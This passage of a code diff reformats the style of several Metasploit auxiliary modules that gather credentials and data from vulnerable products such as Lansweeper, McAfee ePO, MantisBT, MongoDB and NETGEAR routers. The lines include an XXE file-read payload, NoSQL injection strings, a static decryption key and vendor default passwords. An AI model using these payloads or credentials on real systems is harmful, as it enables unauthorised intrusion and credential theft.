xml.send('AbbrListCondition') {
xml.send('SearchKey') { xml.text 'None' }
xml.send('WellUse') { xml.text 'false' }
xml.send('ObtainCondition'){
xml.send('WellUse') { xml.text 'false' }
xml.send('ObtainCondition') {
xml.send('Type') { xml.text 'OffsetList' }
xml.send('OffsetRange'){
xml.send('OffsetRange') {
xml.send('Start') { xml.text '1' }
xml.send('Length') { xml.text '100' }
}
@@ -124,11 +125,12 @@ class MetasploitModule < Msf::Auxiliary
# Validate XML Major Minor version
def version
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => '<SOAP-ENV:Envelope></SOAP-ENV:Envelope>'
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
@@ -140,9 +142,8 @@ class MetasploitModule < Msf::Auxiliary
minor = ("#{minor_parse}")
login(major, minor)
end
rescue ::Rex::ConnectionError
print_error("Version check Connection failed")
rescue ::Rex::ConnectionError
print_error("Version check Connection failed")
end
# This section logs on and retrieves AuthKey token
@@ -151,11 +152,12 @@ class MetasploitModule < Msf::Auxiliary
# Send post request with crafted XML to login and retrieve AuthKey
begin
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => authreq_xml.to_xml
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => authreq_xml.to_xml
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
@@ -178,11 +180,12 @@ class MetasploitModule < Msf::Auxiliary
# Send post request with crafted XML as data
begin
response = send_request_cgi(
{
'uri' => '/',
'method' => 'POST',
'data' => smbreq_xml.to_xml
}, datastore['TIMEOUT'].to_i)
{
'uri' => '/',
'method' => 'POST',
'data' => smbreq_xml.to_xml
}, datastore['TIMEOUT'].to_i
)
if response.nil?
print_error("No response from device")
return
modules/auxiliary/gather/lansweeper_collector.rb
+22 -22
View File
@@ -8,40 +8,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Lansweeper Credential Collector',
'Description' => %q(
Lansweeper stores the credentials it uses to scan the computers
in its Microsoft SQL database. The passwords are XTea-encrypted with a
68 character long key, in which the first 8 characters are stored with
the password in the database and the other 60 is static. Lansweeper, by
default, creates an MSSQL user "lansweeperuser" with the password is
"mysecretpassword0*", and stores its data in a database called
"lansweeperdb". This module will query the MSSQL database for the
credentials.
),
'Author' =>
[
super(
update_info(
info,
'Name' => 'Lansweeper Credential Collector',
'Description' => %q{
Lansweeper stores the credentials it uses to scan the computers
in its Microsoft SQL database. The passwords are XTea-encrypted with a
68 character long key, in which the first 8 characters are stored with
the password in the database and the other 60 is static. Lansweeper, by
default, creates an MSSQL user "lansweeperuser" with the password is
"mysecretpassword0*", and stores its data in a database called
"lansweeperdb". This module will query the MSSQL database for the
credentials.
},
'Author' => [
'sghctoma <tamas.szakaly[at]praudit.hu>', # Lansweeper RCE + Metasploit implementation
'eq <balazs.bucsay[at]praudit.hu>', # Lansweeper RCE + discovering default credentials
'calderpwn <calderon[at]websec.mx>' # Module for lansweeper (5.3.0.8)
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'License' => MSF_LICENSE,
'DefaultOptions' => {
'USERNAME' => 'lansweeperuser',
'PASSWORD' => 'mysecretpassword0*'
},
'References' =>
[
'References' => [
['URL', 'http://www.lansweeper.com'],
['URL', 'http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea']
]))
]
)
)
register_options([
OptString.new('DATABASE', [true, 'The Lansweeper database', 'lansweeperdb'])
])
end
def uint32(n)
@@ -146,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
result[:rows].each do |row|""
result[:rows].each do |row|
pw = lsw_decrypt(row[2])
print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{pw}")
modules/auxiliary/gather/mantisbt_admin_sqli.rb
+23 -21
View File
@@ -6,38 +6,40 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
an attacker can gain access to administrative credentials.
def initialize(info = {})
super(
update_info(
info,
'Name' => "MantisBT Admin SQL Injection Arbitrary File Read",
'Description' => %q{
Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
an attacker can gain access to administrative credentials.
This vuln was fixed in 1.2.17.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jakub Galczyk', #initial discovery
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
This vuln was fixed in 1.2.17.
},
'License' => MSF_LICENSE,
'Author' => [
'Jakub Galczyk', # initial discovery
'Brandon Perry <bperry.volatile[at]gmail.com>' # meatpistol module
],
'References' =>
[
'References' => [
['CVE', '2014-2238'],
['URL', 'https://www.mantisbt.org/bugs/view.php?id=17055']
],
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => '2014-02-28'))
'Platform' => ['win', 'linux'],
'Privileged' => false,
'DisclosureDate' => '2014-02-28'
)
)
register_options(
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
OptString.new('PASSWORD', [ true, 'Single password', 'root']),
OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
])
]
)
end
def run
modules/auxiliary/gather/mcafee_epo_xxe.rb
+32 -30
View File
@@ -9,39 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure',
'Description' => %q{
This module will exploit an authenticated XXE vulnerability to read the keystore.properties
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
super(
update_info(
info,
'Name' => 'McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure',
'Description' => %q{
This module will exploit an authenticated XXE vulnerability to read the keystore.properties
off of the filesystem. This properties file contains an encrypted password that is set during
installation. What is interesting about this password is that it is set as the same password
as the database 'sa' user and of the admin user created during installation. This password
is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,
if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server
user in order to achieve remote command execution with permissions of the database process. If
the administrator has not changed the password for the initially created account since installation,
the attacker will have the password for this account. By default, 'admin' is recommended.
Any user account can be used to exploit this, all that is needed is a valid credential.
Any user account can be used to exploit this, all that is needed is a valid credential.
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #metasploit module
The most data that can be successfully retrieved is 255 characters due to length restrictions
on the field used to perform the XXE attack.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>' # metasploit module
],
'References' =>
[
'References' => [
['CVE', '2015-0921'],
['CVE', '2015-0922'],
['URL', 'https://seclists.org/fulldisclosure/2015/Jan/8']
],
'DisclosureDate' => '2015-01-06'
))
'DisclosureDate' => '2015-01-06'
)
)
register_options(
[
@@ -50,15 +51,16 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [ true, "Base ePO directory path", '/']),
OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
])
]
)
end
def run
key = "\x5E\x9C\x3E\xDF\xE6\x25\x84\x36\x66\x21\x93\x80\x31\x5A\x29\x33" #static key used
key = "\x5E\x9C\x3E\xDF\xE6\x25\x84\x36\x66\x21\x93\x80\x31\x5A\x29\x33" # static key used
aes = OpenSSL::Cipher.new('AES-128-ECB') # ecb, bad bad tsk
aes.decrypt
aes.padding=1
aes.padding = 1
aes.key = key
res = send_request_cgi({
@@ -102,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
cookie = res.get_cookies
#This vuln requires a bit of setup before we can exploit it
# This vuln requires a bit of setup before we can exploit it
print_status("Setting up environment for exploitation")
@@ -202,7 +204,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Sending payload...")
filepath = "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///'+filepath+'" >]><conditions><condition grouping="or"><prop-key>OrionTaskLogTaskMessage.Message</prop-key><op-key>eq</op-key><value>&xxe;</value></condition></conditions>'
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///' + filepath + '" >]><conditions><condition grouping="or"><prop-key>OrionTaskLogTaskMessage.Message</prop-key><op-key>eq</op-key><value>&xxe;</value></condition></conditions>'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'core', 'orionUpdateTableFilter.do'),
modules/auxiliary/gather/memcached_extractor.rb
+23 -15
View File
@@ -9,20 +9,21 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'Memcached Extractor',
'Description' => %q(
This module extracts the slabs from a memcached instance. It then
finds the keys and values stored in those slabs.
),
'Author' => [ 'Paul Deardorff <paul_deardorff[at]rapid7.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
super(
update_info(
info,
'Name' => 'Memcached Extractor',
'Description' => %q{
This module extracts the slabs from a memcached instance. It then
finds the keys and values stored in those slabs.
},
'Author' => [ 'Paul Deardorff <paul_deardorff[at]rapid7.com>' ],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/memcached/memcached/blob/master/doc/protocol.txt']
]
))
)
)
register_options(
[
@@ -58,8 +59,10 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
matches = data.scan(/^ITEM (?<key>.*) \[/)
break if matches.empty?
keys = keys + matches.flatten!
break if data =~ /^END/
end
@@ -74,6 +77,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0
matches = data.scan(/^STAT (?<slab_id>(\d)*):/)
slab_ids << matches
break if data =~ /^END/
@@ -88,10 +92,13 @@ class MetasploitModule < Msf::Auxiliary
loop do
data = sock.recv(4096)
break if !data || data.length == 0 || data == "END\r\n" || data == "ERROR\r\n"
matches = data.scan(/^key=(?<key>.*) exp=/)
break if matches.empty?
keys = keys + matches.flatten!
break if data =~ /^END/
data = ''
end
keys
@@ -105,6 +112,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
data_part = sock.recv(4096)
break if !data_part || data_part.length == 0
data << data_part
break if data_part =~ /^END/
end
@@ -149,7 +157,7 @@ class MetasploitModule < Msf::Auxiliary
print_error("unable to determine memcached protocol version")
return
end
if(command_string=='cachedump')
if (command_string == 'cachedump')
keys = enumerate_keys
else
keys = enumerate_keys_lru
@@ -159,8 +167,8 @@ class MetasploitModule < Msf::Auxiliary
data = data_for_keys(keys)
result_table = Rex::Text::Table.new(
'Header' => "Keys/Values Found for #{peer}",
'Indent' => 1,
'Header' => "Keys/Values Found for #{peer}",
'Indent' => 1,
'Columns' => [ 'Key', 'Value' ]
)
data.take(print_keys).each { |key, value| result_table << [key, value.inspect] }
modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
+28 -23
View File
@@ -7,36 +7,41 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' =>
['Brandon Perry <bperry.volatile[at]gmail.com>'],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "MongoDB NoSQL Collection Enumeration Via Injection",
'Description' => %q{
This module can exploit NoSQL injections on MongoDB versions less than 2.4
and enumerate the collections available in the data via boolean injections.
},
'License' => MSF_LICENSE,
'Author' => ['Brandon Perry <bperry.volatile[at]gmail.com>'],
'References' => [
['URL', 'https://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-nodejs-server-side#_=_']
],
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => '2014-06-07'))
'Platform' => ['linux', 'win'],
'Privileged' => false,
'DisclosureDate' => '2014-06-07'
)
)
register_options(
register_options(
[
OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
])
]
)
end
def syntaxes
[["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"','"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this","||[inject]"]]
[
["\"'||this||'", "'||[inject]||'"],
["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
['\'"||this||"', '"||[inject]||"'],
['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
["||this", "||[inject]"]
]
end
def run
@@ -120,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary
name = ''
(0...name_len).each do |k|
[*('a'..'z'),*('0'..'9'),*('A'..'Z'),'.'].each do |c|
[*('a'..'z'), *('0'..'9'), *('A'..'Z'), '.'].each do |c|
str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
res = send_request_cgi({
'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
modules/auxiliary/gather/ms14_052_xmldom.rb
+20 -19
View File
@@ -3,36 +3,37 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::JSObfu
def initialize(info={})
super(update_info(info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file path should look like this:
c:\\\\windows\\\\system32\\\\calc.exe
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
'Description' => %q{
This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.
It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you
must supply your own list of file paths. Each file path should look like this:
c:\windows\system32\calc.exe
},
'License' => MSF_LICENSE,
'Author' => [
'Soroush Dalili', # @irsdl - Original discovery. MSF module is from his PoC
'sinn3r'
],
'References' =>
[
'References' => [
[ 'CVE', '2013-7331'],
[ 'MSB', 'MS14-052' ],
[ 'URL', 'https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/' ],
[ 'URL', 'http://web.archive.org/web/20240814143555/https://cybersecurity.att.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi' ]
],
'Platform' => 'win',
'DisclosureDate' => '2014-09-09', # MSB. Used in the wild since Feb 2014
))
'Platform' => 'win',
# MSB. Used in the wild since Feb 2014
'DisclosureDate' => '2014-09-09',
)
)
register_options(
[
@@ -167,7 +168,7 @@ class MetasploitModule < Msf::Auxiliary
unless files.empty?
print_good("We have detected the following files:")
files.each do |f|
report_note(host: cli.peerhost, type: 'ie.filenames', data: {:filename => f })
report_note(host: cli.peerhost, type: 'ie.filenames', data: { :filename => f })
print_good(f)
end
end
modules/auxiliary/gather/mybb_db_fingerprint.rb
+60 -56
View File
@@ -7,73 +7,76 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'MyBB Database Fingerprint',
'Description' => %q{
This module checks if MyBB is running behind an URL. Also uses a malformed query to
force an error and fingerprint the backend database used by MyBB on version 1.6.12
and prior.
},
'Author' =>
[
#http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
super(
update_info(
info,
'Name' => 'MyBB Database Fingerprint',
'Description' => %q{
This module checks if MyBB is running behind an URL. Also uses a malformed query to
force an error and fingerprint the backend database used by MyBB on version 1.6.12
and prior.
},
'Author' => [
# http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-13'))
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-02-13'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
])
]
)
end
def check
begin
uri = normalize_uri(target_uri.path, 'index.php')
res = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'intcheck' => 1
begin
uri = normalize_uri(target_uri.path, 'index.php')
res = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'intcheck' => 1
}
})
}
)
if res.nil? || res.code != 200
if res.nil? || res.code != 200
return Exploit::CheckCode::Unknown
end
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
else
php_version = "PHP version unknown"
end
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
else
web_server = "unknown web server"
end
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
rescue
return Exploit::CheckCode::Unknown
end
# Check PhP
php_version = res['X-Powered-By']
if php_version
php_version = "#{php_version}"
else
php_version = "PHP version unknown"
end
# Check Web-Server
web_server = res['Server']
if web_server
web_server = "#{web_server}"
else
web_server = "unknown web server"
end
# Check forum MyBB
if res.body.match("&#077;&#089;&#066;&#066;")
print_good("MyBB forum found running on #{web_server} / #{php_version}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
rescue
return Exploit::CheckCode::Unknown
end
end
def run
print_status("Checking MyBB...")
unless check == Exploit::CheckCode::Detected
@@ -85,12 +88,13 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'memberlist.php')
response = send_request_cgi(
{
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'letter' => -1
}
})
}
}
)
if response.nil?
print_error("Timeout...")
return
modules/auxiliary/gather/natpmp_external_address.rb
+10 -11
View File
@@ -12,12 +12,11 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'NAT-PMP External Address Scanner',
'Name' => 'NAT-PMP External Address Scanner',
'Description' => 'Scan NAT devices for their external address using NAT-PMP',
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
end
def scan_host(ip)
@@ -37,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
# report its external address as alive
if inside_workspace_boundary?(external_address)
report_host(
:host => external_address,
:host => external_address,
:state => Msf::HostState::Alive
)
end
@@ -47,17 +46,17 @@ class MetasploitModule < Msf::Auxiliary
# report the host we scanned as alive
report_host(
:host => shost,
:host => shost,
:state => Msf::HostState::Alive
)
# report NAT-PMP as being open
report_service(
:host => shost,
:port => sport,
:proto => 'udp',
:name => 'natpmp',
:state => Msf::ServiceState::Open
:host => shost,
:port => sport,
:proto => 'udp',
:name => 'natpmp',
:state => Msf::ServiceState::Open
)
end
end
modules/auxiliary/gather/netgear_password_disclosure.rb
+24 -24
View File
@@ -7,24 +7,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'NETGEAR Administrator Password Disclosure',
'Description' => %q{
This module will collect the password for the `admin` user.
The exploit will not complete if password recovery is set on the router.
The password is received by passing the token generated from `unauth.cgi`
to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
products. The full list of affected products is available in the 'References'
section.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'NETGEAR Administrator Password Disclosure',
'Description' => %q{
This module will collect the password for the `admin` user.
The exploit will not complete if password recovery is set on the router.
The password is received by passing the token generated from `unauth.cgi`
to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
products. The full list of affected products is available in the 'References'
section.
},
'Author' => [
'Simon Kenin', # Vuln Discovery, PoC
'thecarterb' # Metasploit module
'thecarterb' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2017-5521' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18758' ],
[ 'URL', 'https://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
@@ -32,13 +31,15 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://pastebin.com/dB4bTgxz'],
[ 'EDB', '41205']
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
])
[
OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
]
)
end
# @return substring of 'text', usually a response from a server in this case
@@ -78,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
r = send_request_cgi({
'uri' => "/passwordrecovered.cgi",
'vars_get' => { 'id' => token }
'vars_get' => { 'id' => token }
})
vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
@@ -108,8 +109,7 @@ class MetasploitModule < Msf::Auxiliary
# Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
# This checks the response for that header.
def check
res = send_request_cgi({'uri'=>'/'})
res = send_request_cgi({ 'uri' => '/' })
if res.nil?
fail_with(Failure::Unreachable, 'Connection timed out.')
end
modules/auxiliary/gather/nis_bootparamd_domain.rb
+28 -25
View File
@@ -9,30 +9,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'NIS bootparamd Domain Name Disclosure',
'Description' => %q{
This module discloses the NIS domain name from bootparamd.
super(
update_info(
info,
'Name' => 'NIS bootparamd Domain Name Disclosure',
'Description' => %q{
This module discloses the NIS domain name from bootparamd.
You must know a client address from the target's bootparams file.
You must know a client address from the target's bootparams file.
Hint: try hosts within the same network range as the target.
},
'Author' => [
'SATAN', # boot.c
'pentestmonkey', # Blog post
'wvu' # Metasploit module
],
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506'],
['URL', 'https://pentestmonkey.net/blog/nis-domain-name']
],
'License' => MSF_LICENSE
))
Hint: try hosts within the same network range as the target.
},
'Author' => [
'SATAN', # boot.c
'pentestmonkey', # Blog post
'wvu' # Metasploit module
],
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506'],
['URL', 'https://pentestmonkey.net/blog/nis-domain-name']
],
'License' => MSF_LICENSE
)
)
register_options([
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'udp', %w[tcp udp]]),
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'udp', %w[tcp udp]]),
OptAddress.new('CLIENT', [true, "Client from target's bootparams file"])
])
@@ -42,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
end
def run
proto = datastore['PROTOCOL']
proto = datastore['PROTOCOL']
client = datastore['CLIENT']
begin
@@ -106,11 +109,11 @@ class MetasploitModule < Msf::Auxiliary
print_good(msg)
report_note(
host: rhost,
port: rport,
host: rhost,
port: rport,
proto: proto,
type: 'nis.bootparamd.domain',
data: { :message => msg }
type: 'nis.bootparamd.domain',
data: { :message => msg }
)
end
end
modules/auxiliary/gather/nis_ypserv_map.rb
+35 -32
View File
@@ -9,36 +9,39 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'NIS ypserv Map Dumper',
'Description' => %q{
This module dumps the specified map from NIS ypserv.
super(
update_info(
info,
'Name' => 'NIS ypserv Map Dumper',
'Description' => %q{
This module dumps the specified map from NIS ypserv.
The following examples are from ypcat -x:
The following examples are from ypcat -x:
Use "ethers" for map "ethers.byname"
Use "aliases" for map "mail.aliases"
Use "services" for map "services.byname"
Use "protocols" for map "protocols.bynumber"
Use "hosts" for map "hosts.byname"
Use "networks" for map "networks.byaddr"
Use "group" for map "group.byname"
Use "passwd" for map "passwd.byname"
Use "ethers" for map "ethers.byname"
Use "aliases" for map "mail.aliases"
Use "services" for map "services.byname"
Use "protocols" for map "protocols.bynumber"
Use "hosts" for map "hosts.byname"
Use "networks" for map "networks.byaddr"
Use "group" for map "group.byname"
Use "passwd" for map "passwd.byname"
You may specify a map by one of the nicknames above.
},
'Author' => 'wvu',
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506']
],
'License' => MSF_LICENSE
))
You may specify a map by one of the nicknames above.
},
'Author' => 'wvu',
'References' => [
['URL', 'https://datatracker.ietf.org/doc/html/rfc1831'],
['URL', 'https://datatracker.ietf.org/doc/html/rfc4506']
],
'License' => MSF_LICENSE
)
)
register_options([
OptEnum.new('PROTOCOL', [true, 'Protocol to use', 'tcp', %w[tcp udp]]),
OptString.new('DOMAIN', [true, 'NIS domain']),
OptString.new('MAP', [true, 'NIS map to dump', 'passwd'])
OptString.new('MAP', [true, 'NIS map to dump', 'passwd'])
])
register_advanced_options([
@@ -47,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
end
def run
proto = datastore['PROTOCOL']
domain = datastore['DOMAIN']
proto = datastore['PROTOCOL']
domain = datastore['DOMAIN']
map_name = nick_to_map(datastore['MAP'])
begin
@@ -151,14 +154,14 @@ class MetasploitModule < Msf::Auxiliary
# ypcat -x
def nick_to_map(nick)
{
'ethers' => 'ethers.byname',
'aliases' => 'mail.aliases',
'services' => 'services.byname',
'ethers' => 'ethers.byname',
'aliases' => 'mail.aliases',
'services' => 'services.byname',
'protocols' => 'protocols.bynumber',
'hosts' => 'hosts.byname',
'networks' => 'networks.byaddr',
'group' => 'group.byname',
'passwd' => 'passwd.byname'
'hosts' => 'hosts.byname',
'networks' => 'networks.byaddr',
'group' => 'group.byname',
'passwd' => 'passwd.byname'
}[nick] || nick
end
modules/auxiliary/gather/nuuo_cms_bruteforce.rb
+27 -26
View File
@@ -11,34 +11,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Nuuo Central Management Server User Session Token Bruteforce',
'Description' => %q{
Nuuo Central Management Server below version 2.4 has a flaw where it sends the
heap address of the user object instead of a real session number when a user logs
in. This can be used to reduce the keyspace for the session number from 10 million
to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.
This module does exactly that - it uses a computed occurrence table to try the most common
combinations up to 1.2 million to try to guess a valid user session.
This session number can then be used to achieve code execution or download files - see
the other Nuuo CMS auxiliary and exploit modules.
Note that for this to work a user has to be logged into the system.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
super(
update_info(
info,
'Name' => 'Nuuo Central Management Server User Session Token Bruteforce',
'Description' => %q{
Nuuo Central Management Server below version 2.4 has a flaw where it sends the
heap address of the user object instead of a real session number when a user logs
in. This can be used to reduce the keyspace for the session number from 10 million
to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.
This module does exactly that - it uses a computed occurrence table to try the most common
combinations up to 1.2 million to try to guess a valid user session.
This session number can then be used to achieve code execution or download files - see
the other Nuuo CMS auxiliary and exploit modules.
Note that for this to work a user has to be logged into the system.
},
'Author' => [
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-17888' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
],
'Platform' => ['win'],
'DisclosureDate' => '2018-10-11'))
'Platform' => ['win'],
'DisclosureDate' => '2018-10-11'
)
)
deregister_options('SESSION', 'USERNAME', 'PASSWORD')
end
@@ -67,15 +69,14 @@ class MetasploitModule < Msf::Auxiliary
['3', '6', '7', 'b', 'e', '9', '2', 'f', '4', '1', 'c', 'a', '0', 'd', '8'],
['0', '8']
def session_number_list(weighted_array)
# Let's calculate all the possible combinations
length = Array.new(weighted_array.length)
for i in (0..weighted_array.length-1)
for i in (0..weighted_array.length - 1)
length[i] = weighted_array[i].length
end
counter = Array.new(weighted_array.length)
